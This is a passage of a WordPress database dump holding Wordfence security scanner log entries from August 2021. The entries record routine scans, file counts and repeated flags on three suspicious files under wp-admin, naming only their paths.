far'),(1960,1628462044.804601,2,'info','Analyzed 3000 files containing 62.42 MB of data so far'),(1961,1628462045.045218,2,'info','Analyzed 3015 files containing 62.72 MB of data.'),(1969,1628462046.482369,2,'info','Starting scan of file contents'),(1970,1628462047.513553,2,'info','Scanned contents of 49 additional files at 48.62 per second'),(1971,1628462048.309247,2,'info','Scanned contents of 86 additional files at 47.69 per second'),(1972,1628462048.312528,2,'info','Asking Wordfence to check URLs against malware list.'),(1973,1628462048.317083,2,'info','Checking 198 host keys against Wordfence scanning servers.'),(1974,1628462048.927080,2,'info','Done host key check.'),(1975,1628462049.706102,2,'info','Done file contents scan'),(1976,1628462049.716882,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(1977,1628462049.737809,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/maint/hnsqbue.php'),(1978,1628462049.758897,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/includes/fm.php'),(1984,1628462053.200546,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(1985,1628462053.203576,2,'info','Checking 1520 host keys against Wordfence scanning servers.'),(1986,1628462053.990142,2,'info','Done host key check.'),(1987,1628462053.992913,2,'info','Done examining URLs'),(1992,1628462054.278601,2,'info','Starting password strength check on 1 user.'),(1999,1628462057.528557,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2000,1628462057.540161,2,'info','Done examining URLs'),(2002,1628462057.737217,1,'info','-------------------'),(2003,1628462057.740334,2,'info','Wordfence used 10 MB of memory for scan. Server peak memory usage was: 34 MB'),(2004,1628462057.742935,1,'info','Scan Complete. Scanned 3015 files, 5 plugins, 1 themes, 251 posts, 0 comments and 1772 URLs in 1 minute 21 seconds.'),(2007,1628508320.704766,1,'info','Initiating quick scan'),(2012,1628508320.928771,1,'info','-------------------'),(2013,1628508320.972939,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 24 MB'),(2014,1628508321.198081,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2017,1628594887.660502,1,'info','Initiating quick scan'),(2022,1628594888.073633,1,'info','-------------------'),(2023,1628594888.105551,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 16 MB'),(2024,1628594888.130740,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2027,1628681123.349905,1,'info','Initiating quick scan'),(2032,1628681123.590663,1,'info','-------------------'),(2033,1628681123.655095,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(2034,1628681123.685044,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2036,1628721033.648712,1,'info','Scheduled Wordfence scan starting at Wednesday 11th of August 2021 10:30:33 PM'),(2038,1628721034.216107,1,'info','Contacting Wordfence to initiate scan'),(2045,1628721041.815199,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2046,1628721041.825878,2,'info','The disk has 3464307.98 MB available'),(2054,1628721042.072613,2,'info','Getting plugin list from WordPress'),(2055,1628721042.111859,2,'info','Found 4 plugins'),(2056,1628721042.114827,2,'info','Getting theme list from WordPress'),(2057,1628721042.156903,2,'info','Found 1 theme'),(2069,1628721044.298925,2,'info','500 files indexed'),(2070,1628721044.373554,2,'info','1000 files indexed'),(2071,1628721044.433777,2,'info','1500 files indexed'),(2072,1628721044.499140,2,'info','2000 files indexed'),(2073,1628721044.596549,2,'info','2500 files indexed'),(2074,1628721044.632599,2,'info','3000 files indexed'),(2075,1628721044.646747,2,'info','3015 files indexed'),(2076,1628721046.665208,2,'info','Analyzed 100 files containing 1.67 MB of data so far'),(2077,1628721049.492223,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(2078,1628721052.403197,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(2079,1628721055.405732,2,'info','Analyzed 400 files containing 7.28 MB of data so far'),(2080,1628721058.204866,2,'info','Analyzed 500 files containing 8.16 MB of data so far'),(2081,1628721060.373080,2,'info','Analyzed 600 files containing 9.35 MB of data so far'),(2082,1628721062.147056,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(2083,1628721063.991393,2,'info','Analyzed 800 files containing 11.2 MB of data so far'),(2084,1628721066.130112,2,'info','Analyzed 900 files containing 12.9 MB of data so far'),(2085,1628721069.347954,2,'info','Analyzed 1000 files containing 17.92 MB of data so far'),(2086,1628721072.579520,2,'info','Analyzed 1100 files containing 20.33 MB of data so far'),(2087,1628721074.883716,2,'info','Analyzed 1200 files containing 21.08 MB of data so far'),(2088,1628721077.104605,2,'info','Analyzed 1300 files containing 22.41 MB of data so far'),(2089,1628721080.370722,2,'info','Analyzed 1400 files containing 23.28 MB of data so far'),(2090,1628721082.792840,2,'info','Analyzed 1500 files containing 23.51 MB of data so far'),(2091,1628721085.124849,2,'info','Analyzed 1600 files containing 23.54 MB of data so far'),(2092,1628721087.445460,2,'info','Analyzed 1700 files containing 24.37 MB of data so far'),(2093,1628721089.932172,2,'info','Analyzed 1800 files containing 29.27 MB of data so far'),(2094,1628721092.511806,2,'info','Analyzed 1900 files containing 30.06 MB of data so far'),(2095,1628721094.633345,2,'info','Analyzed 2000 files containing 30.87 MB of data so far'),(2096,1628721096.755517,2,'info','Analyzed 2100 files containing 32.88 MB of data so far'),(2097,1628721099.735271,2,'info','Analyzed 2200 files containing 35.36 MB of data so far'),(2098,1628721102.187916,2,'info','Analyzed 2300 files containing 36.52 MB of data so far'),(2099,1628721104.277402,2,'info','Analyzed 2400 files containing 46.04 MB of data so far'),(2100,1628721107.288168,2,'info','Analyzed 2500 files containing 51.47 MB of data so far'),(2101,1628721110.867182,2,'info','Analyzed 2600 files containing 52.87 MB of data so far'),(2102,1628721113.786090,2,'info','Analyzed 2700 files containing 55.17 MB of data so far'),(2103,1628721116.130700,2,'info','Analyzed 2800 files containing 59.35 MB of data so far'),(2104,1628721119.346283,2,'info','Analyzed 2900 files containing 60.75 MB of data so far'),(2105,1628721121.377998,2,'info','Analyzed 3000 files containing 62.42 MB of data so far'),(2106,1628721121.972113,2,'info','Analyzed 3015 files containing 62.73 MB of data.'),(2114,1628721123.983875,2,'info','Starting scan of file contents'),(2115,1628721125.008778,2,'info','Scanned contents of 29 additional files at 28.89 per second'),(2116,1628721126.012781,2,'info','Scanned contents of 61 additional files at 30.38 per second'),(2117,1628721126.777520,2,'info','Scanned contents of 86 additional files at 31.02 per second'),(2118,1628721126.787937,2,'info','Asking Wordfence to check URLs against malware list.'),(2119,1628721126.790300,2,'info','Checking 198 host keys against Wordfence scanning servers.'),(2120,1628721127.397863,2,'info','Done host key check.'),(2121,1628721128.130240,2,'info','Done file contents scan'),(2122,1628721128.141687,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(2123,1628721128.155757,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/maint/hnsqbue.php'),(2124,1628721128.163236,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/includes/fm.php'),(2130,1628721132.358534,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2131,1628721132.371775,2,'info','Checking 1520 host keys against Wordfence scanning servers.'),(2132,1628721133.137733,2,'info','Done host key check.'),(2133,1628721133.174045,2,'info','Done examining URLs'),(2138,1628721133.859991,2,'info','Starting password strength check on 1 user.'),(2145,1628721136.666320,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2146,1628721136.677019,2,'info','Done examining URLs'),(2148,1628721136.949226,1,'info','-------------------'),(2149,1628721136.959774,2,'info','Wordfence used 10 MB of memory for scan. Server peak memory usage was: 36 MB'),(2150,1628721136.970293,1,'info','Scan Complete. Scanned 3015 files, 5 plugins, 1 themes, 251 posts, 0 comments and 1772 URLs in 1 minute 41 seconds.'),(2153,1628767486.821106,1,'info','Initiating quick scan'),(2158,1628767487.203578,1,'info','-------------------'),(2159,1628767487.230384,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(2160,1628767487.242574,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2163,1628854164.417586,1,'info','Initiating quick scan'),(2168,1628854164.676308,1,'info','-------------------'),(2169,1628854164.709149,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(2170,1628854164.720371,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2173,1628940301.691164,1,'info','Initiating quick scan'),(2178,1628940301.898101,1,'info','-------------------'),(2179,1628940301.919024,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(2180,1628940301.929405,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2182,1628980451.717028,1,'info','Scheduled Wordfence scan starting at Saturday 14th of August 2021 10:34:11 PM'),(2184,1628980453.691512,1,'info','Contacting Wordfence to initiate scan'),(2191,1628980463.011821,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2192,1628980463.023776,2,'info','The disk has 3463688.88 MB available'),(2200,1628980463.291265,2,'info','Getting plugin list from WordPress'),(2201,1628980463.306800,2,'info','Found 4 plugins'),(2202,1628980463.317656,2,'info','Getting theme list from WordPress'),(2203,1628980463.365948,2,'info','Found 1 theme'),(2215,1628980465.417111,2,'info','500 files indexed'),(2216,1628980465.504230,2,'info','1000 files indexed'),(2217,1628980465.599113,2,'info','1500 files indexed'),(2218,1628980465.701586,2,'info','2000 files indexed'),(2219,1628980465.746487,2,'info','2500 files indexed'),(2220,1628980465.783722,2,'info','3000 files indexed'),(2221,1628980465.798266,2,'info','3015 files indexed'),(2222,1628980466.855196,2,'info','Analyzed 100 files containing 1.67 MB of data so far'),(2223,1628980471.528268,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(2224,1628980472.943774,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(2225,1628980473.912402,2,'info','Analyzed 400 files containing 7.28 MB of data so far'),(2226,1628980475.987494,2,'info','Analyzed 500 files containing 8.16 MB of data so far'),(2227,1628980477.617929,2,'info','Analyzed 600 files containing 9.35 MB of data so far'),(2228,1628980480.882837,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(2229,1628980482.502716,2,'info','Analyzed 800 files containing 11.2 MB of data so far'),(2230,1628980483.556354,2,'info','Analyzed 900 files containing 12.9 MB of data so far'),(2231,1628980485.225834,2,'info','Analyzed 1000 files containing 17.92 MB of data so far'),(2232,1628980487.361684,2,'info','Analyzed 1100 files containing 20.33 MB of data so far'),(2233,1628980489.732189,2,'info','Analyzed 1200 files containing 21.08 MB of data so far'),(2234,1628980490.893436,2,'info','Analyzed 1300 files containing 22.41 MB of data so far'),(2235,1628980492.187973,2,'info','Analyzed 1400 files containing 23.28 MB of data so far'),(2236,1628980493.157497,2,'info','Analyzed 1500 files containing 23.51 MB of data so far'),(2237,1628980494.965903,2,'info','Analyzed 1600 files containing 23.54 MB of data so far'),(2238,1628980496.636726,2,'info','Analyzed 1700 files containing 24.37 MB of data so far'),(2239,1628980498.277171,2,'info','Analyzed 1800 files containing 29.27 MB of data so far'),(2240,1628980500.415602,2,'info','Analyzed 1900 files containing 30.06 MB of data so far'),(2241,1628980505.545329,2,'info','Analyzed 2000 files containing 30.87 MB of data so far'),(2242,1628980506.593876,2,'info','Analyzed 2100 files containing 32.88 MB of data so far'),(2243,1628980507.568823,2,'info','Analyzed 2200 files containing 35.36 MB of data so far'),(2244,1628980509.873974,2,'info','Analyzed 2300 files containing 36.52 MB of data so far'),(2245,1628980511.787221,2,'info','Analyzed 2400 files containing 46.04 MB of data so far'),(2246,1628980512.786567,2,'info','Analyzed 2500 files containing 51.47 MB of data so far'),(2247,1628980513.843869,2,'info','Analyzed 2600 files containing 52.87 MB of data so far'),(2248,1628980516.075913,2,'info','Analyzed 2700 files containing 55.17 MB of data so far'),(2249,1628980517.646139,2,'info','Analyzed 2800 files containing 59.35 MB of data so far'),(2250,1628980520.308264,2,'info','Analyzed 2900 files containing 60.75 MB of data so far'),(2251,1628980522.014444,2,'info','Analyzed 3000 files containing 62.42 MB of data so far'),(2252,1628980522.168867,2,'info','Analyzed 3015 files containing 62.73 MB of data.'),(2260,1628980523.854674,2,'info','Starting scan of file contents'),(2261,1628980524.892438,2,'info','Scanned contents of 33 additional files at 32.49 per second'),(2262,1628980525.834162,2,'info','Scanned contents of 86 additional files at 43.93 per second'),(2263,1628980525.857652,2,'info','Asking Wordfence to check URLs against malware list.'),(2264,1628980525.885108,2,'info','Checking 198 host keys against Wordfence scanning servers.'),(2265,1628980526.492284,2,'info','Done host key check.'),(2266,1628980527.408290,2,'info','Done file contents scan'),(2267,1628980527.425372,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(2268,1628980527.844739,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/maint/hnsqbue.php'),(2269,1628980528.322356,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/includes/fm.php'),(2275,1628980530.915919,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2276,1628980530.920093,2,'info','Checking 1520 host keys against Wordfence scanning servers.'),(2277,1628980531.702289,2,'info','Done host key check.'),(2278,1628980531.718919,2,'info','Done examining URLs'),(2283,1628980531.981209,2,'info','Starting password strength check on 1 user.'),(2290,1628980534.752943,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2291,1628980534.763678,2,'info','Done examining URLs'),(2293,1628980534.974393,1,'info','-------------------'),(2294,1628980534.978501,2,'info','Wordfence used 10 MB of memory for scan. Server peak memory usage was: 36 MB'),(2295,1628980534.980335,1,'info','Scan Complete. Scanned 3015 files, 5 plugins, 1 themes, 251 posts, 0 comments and 1772 URLs in 1 minute 20 seconds.'),(2298,1629026835.209299,1,'info','Initiating quick scan'),(2303,1629026835.427906,1,'info','-------------------'),(2304,1629026835.468971,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(2305,1629026835.480273,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2308,1629113260.186695,1,'info','Initiating quick scan'),(2313,1629113260.503499,1,'info','-------------------'),(2314,1629113260.546186,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(2315,1629113260.568501,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2318,1629199623.072651,1,'info','Initiating quick scan'),(2323,1629199623.464070,1,'info','-------------------'),(2324,1629199623.509785,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 10 MB'),(2325,1629199623.538194,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2327,1629239601.469223,1,'info','Scheduled Wordfence scan starting at Tuesday 17th of August 2021 10:33:21 PM'),(2329,1629239602.049704,1,'info','Contacting Wordfence to initiate scan'),(2336,1629239609.267874,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2337,1629239609.278247,2,'info','The disk has 3463917.94 MB available'),(2345,1629239609.510738,2,'info','Getting plugin list from WordPress'),(2346,1629239609.520616,2,'info','Found 4 plugins'),(2347,1629239609.530996,2,'info','Getting theme list from WordPress'),(2348,1629239609.568520,2,'info','Found 1 theme'),(2357,1629239611.237257,10,'info','SUM_DISABLED:Skipping plugin scan'),(2358,1629239611.241642,10,'info','SUM_START:Scanning for known malware files'),(2359,1629239611.258699,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(2360,1629239611.374927,2,'info','500 files indexed'),(2361,1629239611.439119,2,'info','1000 files indexed'),(2362,1629239611.480446,2,'info','1500 files indexed'),(2363,1629239611.529559,2,'info','2000 files indexed'),(2364,1629239611.602038,2,'info','2500 files indexed'),(2365,1629239611.654609,2,'info','3000 files indexed'),(2366,1629239611.694857,2,'info','3015 files indexed'),(2367,1629239614.276224,2,'info','Analyzed 100 files containing 1.67 MB of data so far'),(2368,1629239615.667258,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(2369,1629239617.382347,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(2370,1629239620.056672,2,'info','Analyzed 400 files containing 7.28 MB of data so far'),(2371,1629239622.439740,2,'info','Analyzed 500 files containing 8.16 MB of data so far'),(2372,1629239624.514276,2,'info','Analyzed 600 files containing 9.35 MB of data so far'),(2373,1629239626.846494,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(2374,1629239630.349450,2,'info','Analyzed 800 files containing 11.2 MB of data so far'),(2375,1629239632.387545,2,'info','Analyzed 900 files containing 12.9 MB of data so far'),(2376,1629239635.615118,2,'info','Analyzed 1000 files containing 17.92 MB of data so far'),(2377,1629239637.516187,2,'info','Analyzed 1100 files containing 20.33 MB of data so far'),(2378,1629239639.625826,2,'info','Analyzed 1200 files containing 21.08 MB of data so far'),(2379,1629239642.449961,2,'info','Analyzed 1300 files containing 22.41 MB of data so far'),(2380,1629239645.619836,2,'info','Analyzed 1400 files containing 23.28 MB of data so far'),(2381,1629239647.711281,2,'info','Analyzed 1500 files containing 23.51 MB of data so far'),(2382,1629239651.737642,2,'info','Analyzed 1600 files containing 23.54 MB of data so far'),(2383,1629239654.229856,2,'info','Analyzed 1700 files containing 24.37 MB of data so far'),(2384,1629239658.379353,2,'info','Analyzed 1800 files containing 29.28 MB of data so far'),(2385,1629239660.977410,2,'info','Analyzed 1900 files containing 30.08 MB of data so far'),(2386,1629239664.282990,2,'info','Analyzed 2000 files containing 30.88 MB of data so far'),(2387,1629239668.143087,2,'info','Analyzed 2100 files containing 32.89 MB of data so far'),(2388,1629239670.823948,2,'info','Analyzed 2200 files containing 35.37 MB of data so far'),(2389,1629239673.446737,2,'info','Analyzed 2300 files containing 36.53 MB of data so far'),(2390,1629239678.088912,2,'info','Analyzed 2400 files containing 46.05 MB of data so far'),(2391,1629239679.683513,2,'info','Analyzed 2500 files containing 51.48 MB of data so far'),(2392,1629239683.627967,2,'info','Analyzed 2600 files containing 52.88 MB of data so far'),(2393,1629239685.897378,2,'info','Analyzed 2700 files containing 55.18 MB of data so far'),(2394,1629239688.168073,2,'info','Analyzed 2800 files containing 59.36 MB of data so far'),(2395,1629239690.901195,2,'info','Analyzed 2900 files containing 60.76 MB of data so far'),(2396,1629239694.746600,2,'info','Analyzed 3000 files containing 62.43 MB of data so far'),(2397,1629239695.038748,2,'info','Analyzed 3015 files containing 62.74 MB of data.'),(2398,1629239695.040414,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(2399,1629239695.084049,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(2400,1629239695.122759,10,'info','SUM_ENDOK:Scanning for known malware files'),(2401,1629239695.147155,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(2402,1629239695.171008,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(2403,1629239695.213778,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(2404,1629239695.226263,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(2405,1629239696.736534,2,'info','Starting scan of file contents'),(2406,1629239697.772353,2,'info','Scanned contents of 28 additional files at 27.90 per second'),(2407,1629239698.775021,2,'info','Scanned contents of 66 additional files at 32.90 per second'),(2408,1629239699.801969,2,'info','Scanned contents of 78 additional files at 25.72 per second'),(2409,1629239699.997440,2,'info','Scanned contents of 86 additional files at 26.64 per second'),(2410,1629239700.003645,2,'info','Asking Wordfence to check URLs against malware list.'),(2411,1629239700.009627,2,'info','Checking 198 host keys against Wordfence scanning servers.'),(2412,1629239700.635313,2,'info','Done host key check.'),(2413,1629239701.396984,2,'info','Done file contents scan'),(2414,1629239701.404616,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(2415,1629239701.421954,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/maint/hnsqbue.php'),(2416,1629239701.436421,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/includes/fm.php'),(2417,1629239701.476553,10,'info','SUM_ENDBAD:Scanning file contents for infections and vulnerabilities'),(2418,1629239701.506327,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(2419,1629239701.540786,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(2420,1629239701.563787,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(2421,1629239701.608558,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(2422,1629239708.104851,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2423,1629239708.117144,2,'info','Checking 1520 host keys against Wordfence scanning servers.'),(2424,1629239708.895831,2,'info','Done host key check.'),(2425,1629239708.906913,2,'info','Done examining URLs'),(2426,1629239709.025867,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(2427,1629239709.118334,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(2428,1629239709.435084,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(2429,1629239709.462772,10,'info','SUM_START:Scanning for weak passwords'),(2430,1629239709.475135,2,'info','Starting password strength check on 1 user.'),(2431,1629239709.567400,10,'info','SUM_ENDOK:Scanning for weak passwords'),(2432,1629239709.617013,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(2433,1629239711.001946,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(2434,1629239711.014483,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(2435,1629239711.627643,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(2436,1629239711.745796,10,'info','SUM_START:Scanning for suspicious site options'),(2437,1629239711.921218,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2438,1629239711.962289,2,'info','Done examining URLs'),(2439,1629239712.042098,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(2440,1629239712.076749,1,'info','-------------------'),(2441,1629239712.078968,2,'info','Wordfence used 12.38 MB of memory for scan. Server peak memory usage was: 38.38 MB'),(2442,1629239712.080961,1,'info','Scan Complete. Scanned 3015 files, 5 plugins, 1 themes, 251 posts, 0 comments and 1772 URLs in 1 minute 49 seconds.'),(2443,1629239712.090939,10,'info','SUM_FINAL:Scan complete. You have 12 new issues to fix. See below.'),(2444,1629286169.557515,10,'info','SUM_PREP:Preparing a new scan.'),(2445,1629286169.575897,1,'info','Initiating quick scan'),(2446,1629286169.602667,10,'info','SUM_START:Checking Web Application Firewall status'),(2447,1629286169.609720,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(2448,1629286169.635949,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(2449,1629286169.761834,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(2450,1629286169.789134,1,'info','-------------------'),(2451,1629286169.812977,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 12 MB'),(2452,1629286169.824650,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2453,1629286169.838352,10,'info','SUM_FINAL:Scan complete. You have 5 new issues to fix. See below.'),(2454,1629372285.389464,10,'info','SUM_PREP:Preparing a new scan.'),(2455,1629372285.431332,1,'info','Initiating quick scan'),(2456,1629372285.458022,10,'info','SUM_START:Checking Web Application Firewall status'),(2457,1629372285.470102,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(2458,1629372285.503915,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(2459,1629372285.651631,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(2460,1629372285.674240,1,'info','-------------------'),(2461,1629372285.695469,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 16 MB'),(2462,1629372285.706129,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2463,1629372285.723325,10,'info','SUM_FINAL:Scan complete. You have 5 new issues to fix. See below.'),(2464,1629381798.506089,10,'info','SUM_PREP:Preparing a new scan.'),(2465,1629381798.528609,1,'info','Initiating quick scan'),(2466,1629381798.551295,10,'info','SUM_START:Checking Web Application Firewall status'),(2467,1629381798.562449,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(2468,1629381798.616781,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(2469,1629381798.629249,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(2470,1629381798.637059,1,'info','-------------------'),(2471,1629381798.641039,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(2472,1629381798.642818,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2473,1629381798.644647,10,'info','SUM_FINAL:Scan complete. You have 1 new issue to fix. See below.'),(2474,1629468249.143378,10,'info','SUM_PREP:Preparing a new scan.'),(2475,1629468249.189430,1,'info','Initiating quick scan'),(2476,1629468249.233516,10,'info','SUM_START:Checking Web Application Firewall status'),(2477,1629468249.244643,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(2478,1629468249.279060,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(2479,1629468249.298007,10,'info','SUM_ENDOK:Scanning for old themes, plugins and core files'),(2480,1629468249.321842,1,'info','-------------------'),(2481,1629468249.348895,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(2482,1629468249.374060,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2483,1629468249.377088,10,'info','SUM_FINAL:Scan complete. Congratulations, no new problems found.'),(2484,1629498617.216805,1,'info','Scheduled Wordfence scan starting at Friday 20th of August 2021 10:30:17 PM'),(2485,1629498618.053208,10,'info','SUM_PREP:Preparing a new scan.'),(2486,1629498618.090065,1,'info','Contacting Wordfence to initiate scan'),(2487,1629498619.135732,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(2488,1629498621.160885,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(2489,1629498623.170820,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blocklist is for paid members only'),(2490,1629498625.186975,10,'info','SUM_START:Checking for the most secure way to get IPs'),(2491,1629498625.192763,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(2492,1629498625.207801,10,'info','SUM_START:Scanning to check available disk space'),(2493,1629498625.212625,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2494,1629498625.214920,2,'info','The disk has 3462342.7 MB available'),(2495,1629498625.217268,10,'info','SUM_ENDOK:Scanning to check available disk space'),(2496,1629498625.228516,10,'info','SUM_START:Checking Web Application Firewall status'),(2497,1629498625.233763,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(2498,1629498625.247320,10,'info','SUM_START:Checking for future GeoIP support'),(2499,1629498625.268971,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(2500,1629498625.304151,10,'info','SUM_START:Checking for paths skipped due to scan settings'),(2501,1629498625.309127,10,'info','SUM_ENDOK:Checking for paths skipped due to scan settings'),(2502,1629498625.317203,2,'info','Getting plugin list from WordPress'),(2503,1629498625.325091,2,'info','Found 4 plugins'),(2504,1629498625.327096,2,'info','Getting theme list from WordPress'),(2505,1629498625.338046,2,'info','Found 1 theme'),(2506,1629498625.742217,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(2507,1629498626.847408,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(2508,1629498626.858349,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(2509,1629498626.862006,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(2510,1629498626.869540,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(2511,1629498626.872428,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(2512,1629498626.879733,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(2513,1629498626.884904,10,'info','SUM_DISABLED:Skipping theme scan'),(2514,1629498626.887153,10,'info','SUM_DISABLED:Skipping plugin scan'),(2515,1629498626.891977,10,'info','SUM_START:Scanning for known malware files'),(2516,1629498626.900173,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(2517,1629498626.935149,2,'info','500 files indexed'),(2518,1629498626.977292,2,'info','1000 files indexed'),(2519,1629498627.023455,2,'info','1500 files indexed'),(2520,1629498627.073865,2,'info','2000 files indexed'),(2521,1629498627.110876,2,'info','2500 files indexed'),(2522,1629498627.148497,2,'info','3000 files indexed'),(2523,1629498627.259242,2,'info','3500 files indexed'),(2524,1629498627.265608,2,'info','3666 files indexed'),(2525,1629498631.163078,2,'info','Analyzed 100 files containing 1.67 MB of data so far'),(2526,1629498632.522612,2,'info','Analyzed 200 files containing 2.81 MB of data so far'),(2527,1629498635.700679,2,'info','Analyzed 300 files containing 4.04 MB of data so far'),(2528,1629498638.052750,2,'info','Analyzed 400 files containing 6.84 MB of data so far'),(2529,1629498639.184170,2,'info','Analyzed 500 files containing 7.77 MB of data so far'),(2530,1629498640.581918,2,'info','Analyzed 600 files containing 8.87 MB of data so far'),(2531,1629498641.513000,2,'info','Analyzed 700 files containing 12.69 MB of data so far'),(2532,1629498642.594983,2,'info','Analyzed 800 files containing 16.81 MB of data so far'),(2533,1629498644.103142,2,'info','Analyzed 900 files containing 17.98 MB of data so far'),(2534,1629498645.372405,2,'info','Analyzed 1000 files containing 19.53 MB of data so far'),(2535,1629498646.586290,2,'info','Analyzed 1100 files containing 25.47 MB of data so far'),(2536,1629498647.478118,2,'info','Analyzed 1200 files containing 27.72 MB of data so far'),(2537,1629498648.338861,2,'info','Analyzed 1300 files containing 28.65 MB of data so far'),(2538,1629498650.434317,2,'info','Analyzed 1400 files containing 30.13 MB of data so far'),(2539,1629498652.078136,2,'info','Analyzed 1500 files containing 30.48 MB of data so far'),(2540,1629498653.674474,2,'info','Analyzed 1600 files containing 31.41 MB of data so far'),(2541,1629498654.714383,2,'info','Analyzed 1700 files containing 31.44 MB of data so far'),(2542,1629498655.544671,2,'info','Analyzed 1800 files containing 31.47 MB of data so far'),(2543,1629498656.578989,2,'info','Analyzed 1900 files containing 35.1 MB of data so far'),(2544,1629498657.992118,2,'info','Analyzed 2000 files containing 40.39 MB of data so far'),(2545,1629498659.080933,2,'info','Analyzed 2100 files containing 